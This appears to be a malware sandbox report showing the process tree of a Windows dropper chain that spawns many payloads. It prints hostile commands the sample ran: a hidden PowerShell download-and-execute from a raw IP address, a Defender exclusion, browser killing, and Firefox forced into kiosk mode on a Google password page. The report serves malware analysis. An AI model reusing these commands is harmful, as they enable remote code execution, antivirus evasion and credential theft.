PID 1488 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 1488 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 1488 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 2668 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 1040 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2668 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2608 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe
PID 2608 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd"

C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1204

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 1016

C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 500

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8QpbZ8u9\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe

"C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1200

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe

"C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe

"C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.0.1337352138\1171607553" -parentBuildID 20221007134813 -prefsHandle 1244 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd1ffbe0-fde8-41f7-b9f5-a2e143d89b2a} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1324 106dbe58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.1.971295469\132527329" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c80145c5-498f-4946-8dad-2f2b8108cd90} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1552 f3eb258 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.2.1791177149\199354410" -childID 1 -isForBrowser -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a58b41a8-2a8b-4824-ab7a-c6cedf00c3b9} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2220 175d9258 tab

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.3.1120652361\535779563" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2640 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5a22e55-3f41-49f6-9837-3c5a9ea8369b} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2776 1d70a658 tab

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.4.1509203630\1168830996" -childID 3 -isForBrowser -prefsHandle 3660 -prefMapHandle 3768 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {761025cf-1ac0-4ad9-91e7-7c0357446cb6} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3796 e69758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.5.1702620004\829867254" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5a7969e-1401-43b1-b1cd-37389839b617} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3892 1b84d658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.6.705501292\1687976917" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90f30b2a-17ac-4871-b956-62a0716fd10e} 300 "\\.\pipe\gecko-crash-server-pipe.300" 4052 1b84dc58 tab

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1065.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe

"C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

